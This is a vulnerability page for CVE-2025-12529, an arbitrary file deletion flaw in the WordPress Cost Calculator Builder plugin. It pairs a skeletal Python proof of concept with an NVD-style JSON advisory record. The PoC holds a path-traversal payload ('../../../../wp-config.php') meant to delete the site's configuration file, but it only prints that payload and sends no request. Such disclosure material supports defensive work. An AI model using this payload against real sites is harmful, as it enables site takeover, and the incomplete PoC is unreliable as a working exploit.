CVE-2025-12529

import requests import json # CVE-2025-12529 PoC - Arbitrary File Deletion # WordPress Cost Calculator Builder < 3.6.4 target_url = "http://target-wordpress-site.com" # Step 1: Identify WordPress and Cost Calculator Builder def check_vulnerability(): """ Check if target is vulnerable to CVE-2025-12529 This requires Cost Calculator Builder plugin (free + pro) installed """ # Step 2: Inject malicious file path into order # The deleteOrdersFiles() function will delete arbitrary files # Payload to delete wp-config.php payload = { "order_data": { "file_path": "../../../../wp-config.php", "filename": "wp-config.php" } } # This would typically be done through the plugin's order submission endpoint # The exact endpoint depends on the plugin's REST API routes print("CVE-2025-12529 - Arbitrary File Deletion PoC") print("Target: " + target_url) print("Payload: " + json.dumps(payload)) print("Note: Requires admin interaction to trigger file deletion") if __name__ == "__main__": check_vulnerability()

{"cve": {"id": "CVE-2025-12529", "sourceIdentifier": "[email protected]", "published": "2025-12-02T03:16:15.657", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Cost Calculator Builder plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the deleteOrdersFiles() function in all versions up to, and including, 3.6.3. This makes it possible for unauthenticated attackers to inject arbitrary file paths into the orders that are removed, when an administrator deletes them. This can lead to remote code execution when the right file is deleted (such as wp-config.php). This vulnerability requires the Cost Calculator Builder Pro version to be installed along with the free version in order to be exploitable."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.1/includes/classes/CCBOrderController.php#L262", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.1/includes/classes/CCBOrderController.php#L513", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4154684d-3f9b-418f-b9d1-a5d22d4d84d3?source=cve", "source": "[email protected]"}]}}